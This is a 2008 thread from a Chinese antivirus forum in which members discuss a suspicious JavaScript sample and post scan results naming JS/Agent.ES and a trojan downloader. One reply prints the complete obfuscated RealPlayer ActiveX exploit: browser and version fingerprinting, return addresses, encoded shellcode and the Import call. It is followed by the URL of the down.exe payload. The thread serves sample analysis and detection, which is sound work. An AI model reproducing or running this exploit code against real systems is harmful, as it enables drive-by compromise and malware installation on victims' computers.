查看: 5191|回复: 21
收起左侧

[可疑文件] java代码

[复制链接]
lkj-17
发表于 2008-1-6 20:28:23 | 显示全部楼层 |阅读模式
大家看看

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qigang
发表于 2008-1-6 20:33:10 | 显示全部楼层
没有问题吧。
Graybird
发表于 2008-1-6 20:34:18 | 显示全部楼层
Starting the file scan:

Begin scan in 'E:\rl[1].rar'
E:\rl[1].rar
  [0] Archive type: RAR
  --> rl[1].js
      [DETECTION] Contains detection pattern of the Java script virus JS/Agent.ES
      [INFO]      The file was deleted!
saber123
发表于 2008-1-6 20:34:59 | 显示全部楼层
没有查出来...不知道有没有问题这个代码
saber123
发表于 2008-1-6 20:38:08 | 显示全部楼层
原帖由 Graybird 于 2008-1-6 20:34 发表
Starting the file scan:

Begin scan in 'E:\rl[1].rar'
E:\rl[1].rar
  [0] Archive type: RAR
  --> rl[1].js
      [DETECTION] Contains detection pattern of the Java script virus JS/Agent.ES
      ...

我的金山2008查不出来,看来金山对于脚本病毒果然=0
无尽藏海
发表于 2008-1-6 20:40:09 | 显示全部楼层
蜘蛛
rl[1].rar\rl[1].js                               D:\Downloads\样本\rl[1].rar      VBS.PackFor.2
qigang
发表于 2008-1-6 20:53:29 | 显示全部楼层
这个是不是太平洋今天被怀疑挂的那个?
dikex
发表于 2008-1-6 20:58:33 | 显示全部楼层
  1. var addr=["%75%06%74%04","%7f%a5%60","%4f%71%a4%60","%63%11%08%60","%63%11%04%60","%79%31%01%60","%79%31%09%60","%51%11%70%63"];function xinnuo(){var user=navigator.userAgent.toLowerCase();if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)return;if(user.indexOf("nt 5.")==-1)return;VulObject="IEaaR"+"PCaaatl.I"+"EaaaRP"+"Ctaaal.1";try{Real=new ActiveXObject(VulObject.replace(/a/g,""))}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");sdfdgdfg="";cvbcbb=unescape(addr[0]);for(i=0;i<32*148;i++)sdfdgdfg+="S";if(RealVersion.indexOf("6.0.14.")==-1){if(navigator.userLanguage.toLowerCase()=="zh-cn")ret=unescape(addr[1]);else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape(addr[2]);else return}else if(RealVersion=="6.0.14.544")ret=unescape(addr[3]);else if(RealVersion=="6.0.14.550")ret=unescape(addr[4]);else if(RealVersion=="6.0.14.552")ret=unescape(addr[5]);else if(RealVersion=="6.0.14.543")ret=unescape(addr[6]);else if(RealVersion=="6.0.14.536")ret=unescape(addr[7]);else return;if(RealVersion.indexOf("6.0.10.")!=-1){for(i=0;i<4;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.11.")!=-1){for(i=0;i<6;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.12.")!=-1){for(i=0;i<9;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}else if(RealVersion.indexOf("6.0.14.")!=-1){for(i=0;i<10;i++)sdfdgdfg=sdfdgdfg+cvbcbb;sdfdgdfg=sdfdgdfg+ret}qwfgsg="LLLL\\XXXXXLD";Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRQPqrQTnQx0a2OVQ06UedxtnasPopmvO3TPoRWPnVNQuqh1uopuP";xcbfcxn=sdfdgdfg+qwfgsg+Shell;temp=0x8000;while(xcbfcxn.length<temp)xcbfcxn+="lizhen";var arr1=["c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\chimes.wav","c:\\Program Files\\NetMeeting\\TestSnd.wav","C:\\WINDOWS\\system32\\BuzzingBee.wav","C:\\WINDOWS\\clock.avi","c:\\Program Files\\NetMeeting\\..\\..\\WINDOWS\\Media\\tada.wav","C:\\WINDOWS\\system32\\LoopyMusic.wav"];Real.Import(arr1[Math.floor(Math.random()*6)],xcbfcxn,"123456456",0,0)}xinnuo();


复制代码



http://qqq.hao1658.com/down.exe
qigang
发表于 2008-1-6 21:25:03 | 显示全部楼层
瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Malicious Code           

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.25.62

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
无尽藏海
发表于 2008-1-6 21:47:58 | 显示全部楼层

回复 9楼 qigang 的帖子

Begin scan in 'D:\Downloads\样本\virus1.rar'
D:\Downloads\样本\virus1.rar
  [0] Archive type: RAR
  --> down.exe
      [DETECTION] Is the Trojan horse TR/Dldr.Small.hdz.2
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-24 02:07 , Processed in 0.125832 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表